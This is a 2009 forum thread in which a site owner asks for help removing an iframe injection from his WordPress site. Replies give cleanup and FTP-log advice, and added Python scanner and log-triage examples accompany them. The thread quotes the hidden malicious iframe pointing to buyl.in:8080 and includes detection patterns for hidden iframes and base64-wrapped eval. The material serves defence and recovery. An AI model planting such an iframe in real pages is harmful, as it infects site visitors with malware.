
WordPress site hacked!

Discussion in 'Security' started by mike4uuu, Aug 10, 2009.

  1. #1
    Hi!

    My site greatsayings.net was hacked a few days back. Now I have installed fresh WordPress files and the FTP password has been changed a few times!
    At the moment the site seems to be working without any problem.

    Before, whenever I tried to open my site, my antivirus was detecting a virus downloaded from my site!

    Here are the details!

    8/5/2009 7:15:08 AM SYSTEM 180 Sign of "HTML:Iframe-inf" has been found in "http://www.greatsayings.net/\{gzip}" file.

    The index files also got the following extra code:

    <iframe src="http://buyl.in:8080/index.php" width=176 height=185 style="visibility: hidden"></iframe>


    Please advise me what to do and how to remove this badware!!!

    Thanks in advance !
     
    mike4uuu, Aug 10, 2009 IP
  2. BDR_London (Peon) #2
    I have the same problem can anyone help?
     
    BDR_London, Aug 10, 2009 IP
  3. anarchy (Peon) #3
    Remove the 777 from your folders.
     
    anarchy, Aug 10, 2009 IP
  4. mike4uuu (Active Member) #4
    All my file attributes are correct... any suggestions?
     
    mike4uuu, Aug 10, 2009 IP
  5. SecureCP (Guest) #5
    Change your FTP usernames and passwords. If you'd like, I can whip up a quick script to remove all these. Contact your host and ask them for the FTP logs for these particular files. Odds are they were downloaded and within a few seconds uploaded infected. You're right, though: permissions have nothing to do with the mass occurrence of these issues with the :8080 vn, in, etc... injections.
     
    SecureCP, Aug 10, 2009 IP
  6. mike4uuu (Active Member) #6
    Can anyone please recheck whether my site is still infected or not? I want to submit a review to Google.
    Also, how do I check if my site is still infected or not?
    Anybody, please...
     
    mike4uuu, Aug 11, 2009 IP
  7. SecureCP (Guest) #7
    Malicious software is hosted on 1 domain(s), including xi3.ru/

    Find a line including that domain in your files or search for iframes. If you'd like, email it to me and I'll write you a quick script to get rid of them.
     
    SecureCP, Aug 11, 2009 IP
  8. SteveWh (Member) #8
    SteveWh, Aug 13, 2009 IP
  9. mitch5 (Guest) #9
    SecureCP... I read above that you could write a script to remove iframes. We have about 10 sites affected... not at all funny. I am at my wits' end at the moment. Have been searching everywhere for a solution. Could you please explain more about the process above to remove the iframes? I have started to remove them manually one at a time from one site, and more seem to appear or be present in other files, if that makes sense. This problem seems to be very widespread at the moment... Regards, and thank you for any assistance you can offer.
     
    mitch5, Aug 13, 2009 IP
  10. j4k3yyy (Peon) #10
    #!/bin/bash
    # Searches every .php file under the current directory for a string
    # (e.g. the injected domain) and saves the matching lines to a report file.

    echo "Please input the url you wish to search for."

    read -r -a word

    echo "Selected: ${word[0]}"

    # Report filename: the search term with slashes replaced so it is a valid path.
    out="${word[0]//\//_}.txt"

    # -exec needs a terminator ({} +); the redirect applies to find as a whole.
    find . -name '*.php' -exec grep -H -- "${word[0]}" {} + > "$out"
    You will need shell access to the server(s) your sites are on to use this script. IMO, if you can't work out how to run a bash script you shouldn't be running WordPress. I'm sorry for using an array, but this was part of another project I was working on; I just stripped it down to simplify it. :(
     
    j4k3yyy, Aug 15, 2009 IP
  11. SecureCP (Guest) #11
    The above is a great tool, however not 100%. The majority of the time when these injections occur they come encoded and cut and screwed. What Google tells you is xo7.ru or xxxxxx.cn may not look like it within your code. It will look much more, hmmmm, cryptic. Again, if anyone needs it, provide me an index page, or any other which has been hit, and I'll be glad to build a custom script for you. I already have quite a few built, with a list of 10-15 of the most common. If your Google 'infected' page has a domain mentioned as malware, odds are I already have one.
     
    SecureCP, Aug 17, 2009 IP
  12. j4k3yyy (Peon) #12
    I know, it's horrible :p

    Was a quick hack-up from an old script I was using to security audit my PHP for vulnerable functions. When you put something together to scan for custom modifications, make sure you post it! I'd be interested to see :)

    Just a thought: it would be pretty easy to grep for base64 etc. It's very rare I've seen a legitimate script base64'd, but I see it all the time when somebody's trying to obfuscate their malicious code. I might make a project out of this \o/
     
    j4k3yyy, Aug 17, 2009 IP
  13. SecureCP (Guest) #13
    You'd be surprised how many things include base64 by default. I believe WP and WHMCS, to name a few, well, the most common. Find me an infected site, provide me an index file, and away I can go with the code to show you, for example. I'm just here to help.
     
    SecureCP, Aug 17, 2009 IP
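The detection and cleanup discussed in posts #1 and #10 to #13 (the hidden iframe quoted in the first post, base64-wrapped variants of it, and the caveat that WordPress and WHMCS use base64 legitimately), as an added example that is not code from any participant in this thread. It walks a site tree, flags hidden iframes and eval(base64_decode(...)) calls whose payload decodes to iframe/script markup, and can write cleaned copies while keeping a .bak of each touched file. Everything beyond the iframe quoted in post #1 is an assumption for illustration: the base64 wrapper shape, the constructed sample index.php, and the example.invalid payload domain.

```python
"""Added example: find and strip injected iframes in a WordPress tree.

Assumptions (not from the thread): the injected markup looks like the hidden
iframe quoted in post #1, or is wrapped as eval(base64_decode("...")). Legit
base64 use (WordPress and WHMCS both ship some) is kept, because only payloads
that decode to iframe/script/eval markup are treated as malicious.
"""
import base64
import re
import sys
from pathlib import Path

IFRAME_RE = re.compile(r'<iframe\b[^>]*>.*?</iframe>', re.IGNORECASE | re.DOTALL)
# Markers that make an iframe invisible: hidden, display:none, or zero size.
HIDDEN_RE = re.compile(
    r'visibility\s*:\s*hidden|display\s*:\s*none'
    r'|width\s*=\s*["\']?0\b|height\s*=\s*["\']?0\b',
    re.IGNORECASE)
# eval(base64_decode("...")) or a bare base64_decode("...") with a long literal.
B64_RE = re.compile(
    r'(?:eval\s*\(\s*)?base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]{40,})["\']\s*\)'
    r'(?:\s*\))?\s*;?',
    re.IGNORECASE)
# What a decoded payload must contain before it is treated as an injection.
PAYLOAD_RE = re.compile(r'<iframe|<script|eval\s*\(|document\.write', re.IGNORECASE)


def _decode(b64: str) -> str:
    """Decode a base64 literal; return '' if it is not valid base64."""
    try:
        return base64.b64decode(re.sub(r'\s+', '', b64)).decode('latin-1')
    except Exception:
        return ''


def find_injections(text: str):
    """Return (kind, matched_snippet, decoded_preview) for each suspicious hit."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        if HIDDEN_RE.search(m.group(0)):
            hits.append(('hidden_iframe', m.group(0), ''))
    for m in B64_RE.finditer(text):
        decoded = _decode(m.group(1))
        if PAYLOAD_RE.search(decoded):
            hits.append(('base64_payload', m.group(0), decoded[:80]))
    return hits


def clean(text: str) -> str:
    """Drop hidden iframes and base64 calls whose payload decodes to markup/code."""
    text = IFRAME_RE.sub(
        lambda m: '' if HIDDEN_RE.search(m.group(0)) else m.group(0), text)
    return B64_RE.sub(
        lambda m: '' if PAYLOAD_RE.search(_decode(m.group(1))) else m.group(0), text)


def scan_tree(root: str, write_clean: bool = False) -> dict:
    """Scan .php/.html/.js/.sql files under root; optionally clean them in place,
    keeping a .bak copy of each modified file as evidence for the host."""
    report = {}
    for path in Path(root).rglob('*'):
        if path.suffix.lower() not in ('.php', '.html', '.htm', '.js', '.sql'):
            continue
        text = path.read_text(encoding='utf-8', errors='replace')
        hits = find_injections(text)
        if hits:
            report[str(path)] = hits
            if write_clean:
                path.with_name(path.name + '.bak').write_text(text, encoding='utf-8')
                path.write_text(clean(text), encoding='utf-8')
    return report


# Constructed sample index.php: the iframe from post #1 plus a base64-wrapped one;
# the YouTube embed is a benign iframe that must survive cleaning.
_PAYLOAD = '<iframe src="http://example.invalid/x.php" width=0 height=0></iframe>'
SAMPLE_INDEX = (
    '<?php /* constructed sample */\n'
    'eval(base64_decode("' + base64.b64encode(_PAYLOAD.encode()).decode() + '"));\n'
    '?>\n<html><body>\n'
    '<iframe src="http://buyl.in:8080/index.php" width=176 height=185 '
    'style="visibility: hidden"></iframe>\n'
    '<iframe src="https://www.youtube.com/embed/abc" width=560 height=315></iframe>\n'
    '</body></html>\n')
# Constructed benign use of base64_decode (config data), which must be left alone.
SAMPLE_BENIGN = ('<?php $cfg = base64_decode("'
                 + base64.b64encode(b'plain configuration text, not a payload, kept as-is').decode()
                 + '"); ?>')

if __name__ == '__main__':
    args = [a for a in sys.argv[1:] if a != '--clean']
    root = args[0] if args else '.'
    for path, hits in scan_tree(root, write_clean='--clean' in sys.argv).items():
        for kind, snippet, preview in hits:
            print(f'{path}: {kind}: {snippet[:60]!r} {preview!r}')
```

Run it as `python scan.py /path/to/public_html` to report only, and add `--clean` to rewrite files. Because it only reads text, the same scanner works over a mysqldump of the WordPress database saved as a .sql file, which is a quick way to check whether injected markup is sitting in posts or options as well as in index files. It is a heuristic: review every .bak against its cleaned copy before deleting the backups, and treat a clean report as "nothing matched these patterns", not as proof the site is clean.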
  14. mike4uuu (Active Member) #14
    Still stuck with this F### malware... What if I change the hosting, same database with new/latest WordPress files and plugins? Will the malware still be present in my site?

    Please help!
     
    mike4uuu, Aug 20, 2009 IP
  15. mike4uuu (Active Member) #15
    I have checked all my sites ( www.greatsayings.net / funnytopjokes.info / / /) with www.spybye.org.
    The results are clean. Is my site still infected with the malware? Should I submit for a review to Google now?
    Please guide me!
     
    mike4uuu, Aug 20, 2009 IP
  16. mike4uuu (Active Member) #16
    Anyone, please...
     
    mike4uuu, Aug 20, 2009 IP
  17. mike4uuu (Active Member) #17
    Anybody out there? Need your help!
     
    mike4uuu, Aug 21, 2009 IP
  18. SteveWh (Member) #18
    http://www.google.com/safebrowsing/diagnostic?site=http://www.greatsayings.net/

    The site is still listed as suspicious, but it's been a long time since malware was found. Have you requested a review at webmaster tools?

    Google Webmaster Tools
    http://www.google.com/webmasters/

    If this still isn't resolved, see my signature for articles that will help. There are links to places like UnmaskParasites, Dasient, and Web-Sniffer where you can scan your site for malware and view the source code of your pages as others see it.

    Also, if this still isn't resolved, can you please describe all of the steps you have already taken, so that people don't have to suggest doing things you've already done?
     
    SteveWh, Aug 21, 2009 IP
  19. mike4uuu (Active Member) #19
    Thanks Steve!
    Here is what I have done so far...
    1. Scanned the site with spybye.org.
    2. Changed the FTP password / database/MySQL password.
    3. Deleted all the plugins / WP files and replaced them with the latest files.
    4. Before, iframes were there in all index.php files... they are no more at the moment, as far as I know...
    5. Before, the antivirus software Avast used to detect the iframes/malware when I opened my sites, but now no more; but when I try to open my sites, it gives an error...
    6. Scanned my sites for malware presence with http://wam.dasient.com/wam/

    It seems my sites are still infected...

    Please suggest/help!

    What if I change the hosting account... will it work / will it solve my problem? Is this malware in the database? Please advise!
     
    mike4uuu, Aug 22, 2009 IP
  20. SteveWh (Member) #20
    Go to your cPanel > Raw Access Logs. Turn on log archiving, and download your latest FTP access log. Examine it to see if people other than you are transferring files into your site by FTP.

    Get an antivirus program different from the one you're using now. You can go to one of the free online sites like Trend HouseCall. Do a complete system scan, on your PC, not the website. Many, many web sites are hacked because the administrator's PC has spyware on it that is stealing the FTP password. Do a web search on "gumblar" to find out how this happens. When the password is stolen this way, it doesn't matter whether it was strong or not. Most of these administrators thought they were safe because they were running antivirus software, but it was a free one like AVG, and the virus got past it. I haven't seen many complaints about Avast, but still, this time use a different one.

    Then change your FTP password again.

    File a support ticket with your web host, and tell them what has happened.

    cPanel > phpMyAdmin provides a way to browse your database tables to look for suspicious code. During this time when you're just looking, all you have to do is be careful not to change or save anything. Because the iframes were in your index files, I suspect you won't find any bad code in the database, anyway, but it's worth taking a look.

    If you haven't requested a review at Google webmaster tools, go ahead and do it. The last time they found suspicious content was August 4, which was a very long time ago, especially since they visited the site on the 21st (yesterday) and apparently did not find suspicious content.

    Be sure to request a "review", not a "reconsideration". They're two different things.
     
    SteveWh, Aug 22, 2009 IP
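The FTP log review SteveWh describes in post #20, together with the download-then-reupload pattern SecureCP mentions in post #5, as an added example that is not part of the thread: a small Python triage script over an xferlog-style FTP transfer log. The log format, the sample lines, the IP addresses and the administrator's known address are all assumptions for illustration; hosts differ in where they keep FTP logs and in the exact format, so check the first few lines of your own log against the field layout in the comments before trusting the output.

```python
"""Added example: triage an FTP transfer log for the theft-then-reupload pattern.

Assumptions (not from the thread): the host supplies a wu-ftpd/proftpd style
xferlog (one transfer per line), and the administrator knows the IP addresses
they normally connect from. The sample log is constructed, not a real one.
"""
import re
from datetime import datetime

# Constructed sample: an unknown host pulls index.php and pushes a larger copy
# back three seconds later, then touches a theme file; the owner later uploads
# a photo from their usual address.
SAMPLE_XFERLOG = """\
Sun Aug  9 03:12:44 2009 1 203.0.113.7 4521 /home/mike/public_html/index.php b _ o r mike ftp 0 * c
Sun Aug  9 03:12:47 2009 1 203.0.113.7 4793 /home/mike/public_html/index.php b _ i r mike ftp 0 * c
Sun Aug  9 03:12:49 2009 1 203.0.113.7 2210 /home/mike/public_html/wp-content/themes/default/index.php b _ i r mike ftp 0 * c
Mon Aug 10 09:30:02 2009 2 198.51.100.12 18340 /home/mike/public_html/wp-content/uploads/photo.jpg b _ i r mike ftp 0 * c
"""
KNOWN_ADMIN_IPS = {'198.51.100.12'}  # assumption: the owner's usual address

# xferlog fields: timestamp, transfer secs, remote host, bytes, path, type (a/b),
# special action, direction (i=upload to server, o=download), access mode, user.
XFERLOG_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) (?P<secs>\d+) (?P<host>\S+) '
    r'(?P<size>\d+) (?P<path>\S+) (?P<type>[ab]) (?P<action>\S) (?P<dir>[io]) '
    r'(?P<mode>[arg]) (?P<user>\S+) ')


def parse_line(line: str):
    """Parse one xferlog line into a dict, or None if it is not an xferlog record."""
    m = XFERLOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['when'] = datetime.strptime(rec['ts'], '%a %b %d %H:%M:%S %Y')
    rec['size'] = int(rec['size'])
    return rec


def analyze(log_text: str, known_ips, window_secs: int = 60):
    """Return (finding, host, path) tuples.

    upload_from_unknown_ip:  a file was written from an address the owner never uses.
    download_then_reupload:  the same host fetched a file and pushed it back within
                             window_secs, the footprint of an automated injector
                             working with a stolen password.
    """
    findings = []
    last_download = {}  # (host, path) -> time of the most recent download
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        key = (rec['host'], rec['path'])
        if rec['dir'] == 'o':
            last_download[key] = rec['when']
            continue
        if rec['host'] not in known_ips:
            findings.append(('upload_from_unknown_ip', rec['host'], rec['path']))
        fetched = last_download.get(key)
        if fetched is not None and (rec['when'] - fetched).total_seconds() <= window_secs:
            findings.append(('download_then_reupload', rec['host'], rec['path']))
    return findings


if __name__ == '__main__':
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XFERLOG
    for finding, host, path in analyze(text, KNOWN_ADMIN_IPS):
        print(f'{finding:24s} {host:16s} {path}')
```

A hit from a known address is still worth a look: with the gumblar-style theft described above, the thief logs in with the owner's valid username and password, so the username column proves nothing and the tell is usually the timing (fetch, then push back seconds later, across many index files) or an address the owner never uses. Keep the log itself; it is what the host's support ticket and the Google review will want to see.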